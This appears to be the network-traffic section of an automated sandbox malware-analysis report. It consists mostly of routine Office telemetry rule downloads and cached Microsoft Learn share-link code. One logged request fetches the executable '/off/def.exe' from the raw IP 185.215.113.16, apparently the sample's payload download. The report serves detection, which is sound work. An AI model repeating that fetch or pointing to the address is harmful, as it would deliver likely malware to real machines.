              Source: global trafficHTTP traffic detected: GET /rules/rule702251v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule702250v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule703101v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule702651v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule702650v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule703100v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule702901v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule703601v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule702900v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule703600v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule703851v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule703850v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule703801v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule703800v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule703701v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule703700v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule703751v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule703750v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule701301v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule701300v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule704051v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule704050v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule701701v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule701700v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule702051v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule702050v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule700701v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule700700v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule700551v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule700550v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule703651v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule703650v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule700601v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule703151v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule700600v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule703150v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule703951v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule703950v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule702850v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule702851v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule700001v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule700000v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule701401v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule701400v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule701951v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule701950v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule700851v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule700850v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule701851v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule701850v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule703051v3s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule703050v3s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule700101v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule702101v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule702100v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule700100v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule700951v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule700950v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule703551v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule700451v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule703550v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule702701v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule702700v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule700450v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule701901v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule701900v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule704001v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule704000v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule703251v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule703250v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule702401v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule702400v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule701551v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule701550v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule700301v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule700300v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule702001v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule702000v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule702601v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule703201v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule703200v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule702600v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule700251v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule700250v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule700650v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule700651v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule703301v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule703300v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule701751v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule701650v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule701651v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule701750v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule702451v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule702450v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule701101v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule701100v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120128v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120603v8s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120607v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule230158v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule230104v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule230157v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule230162v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule230164v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule230165v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule230166v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule230167v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule230168v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /off/def.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: 185.215.113.16
              Source: chromecache_94.7.dr, chromecache_83.7.drString found in binary or memory: href="https://www.facebook.com/sharer/sharer.php?u=${s}" equals www.facebook.com (Facebook)
              Source: chromecache_94.7.dr, chromecache_83.7.drString found in binary or memory: href="https://www.linkedin.com/cws/share?url=${s}" equals www.linkedin.com (Linkedin)
              Source: chromecache_94.7.dr, chromecache_83.7.drString found in binary or memory: </section>`}function Dce(e=tw,t=gp){return sl(M4,e,t)}function $ce(e=aw,t=sw){return sl(t4,e,t)}var vI=(s=>(s.facebook="facebook",s.twitter="twitter",s.linkedin="linkedin",s.email="email",s.weibo="weibo",s))(vI||{}),LRe={facebook:"https://www.facebook.com/sharer/sharer.php?u={url}",twitter:"https://twitter.com/intent/tweet?original_referer={url}&text={achievementCopy}&tw_p=tweetbutton&url={url}",linkedin:"https://www.linkedin.com/feed/?shareActive=true&text={body}",email:"mailto:?subject={subject}&body={body}",weibo:"http://service.weibo.com/share/share.php?title={title}&url={url}"};function $x(e,t,o){let n=encodeURIComponent(t),r=new URL(e);r.hostname="learn.microsoft.com";let s=r.href+=(e.indexOf("?")!==-1?"&":"?")+"WT.mc_id=",i=L.sharingId?`&sharingId=${L.sharingId}`:"";return Object.values(vI).reduce((l,c)=>{if(_.data.isPermissioned)return l[c]="#",l;let d=encodeURIComponent(s+c+i),u=o?.achievementCopyTitle?.overrideTitle??t,p=encodeURIComponent(rQ.replace("{achievementTitle}",o?.achievementCopyTitle?.isUnquoted?`${u}`:`"${u}"`)),g={achievementCopy:p,url:d,title:n,body:`${p}${encodeURIComponent(` equals www.facebook.com (Facebook)
              Source: chromecache_94.7.dr, chromecache_83.7.drString found in binary or memory: </section>`}function Dce(e=tw,t=gp){return sl(M4,e,t)}function $ce(e=aw,t=sw){return sl(t4,e,t)}var vI=(s=>(s.facebook="facebook",s.twitter="twitter",s.linkedin="linkedin",s.email="email",s.weibo="weibo",s))(vI||{}),LRe={facebook:"https://www.facebook.com/sharer/sharer.php?u={url}",twitter:"https://twitter.com/intent/tweet?original_referer={url}&text={achievementCopy}&tw_p=tweetbutton&url={url}",linkedin:"https://www.linkedin.com/feed/?shareActive=true&text={body}",email:"mailto:?subject={subject}&body={body}",weibo:"http://service.weibo.com/share/share.php?title={title}&url={url}"};function $x(e,t,o){let n=encodeURIComponent(t),r=new URL(e);r.hostname="learn.microsoft.com";let s=r.href+=(e.indexOf("?")!==-1?"&":"?")+"WT.mc_id=",i=L.sharingId?`&sharingId=${L.sharingId}`:"";return Object.values(vI).reduce((l,c)=>{if(_.data.isPermissioned)return l[c]="#",l;let d=encodeURIComponent(s+c+i),u=o?.achievementCopyTitle?.overrideTitle??t,p=encodeURIComponent(rQ.replace("{achievementTitle}",o?.achievementCopyTitle?.isUnquoted?`${u}`:`"${u}"`)),g={achievementCopy:p,url:d,title:n,body:`${p}${encodeURIComponent(` equals www.linkedin.com (Linkedin)
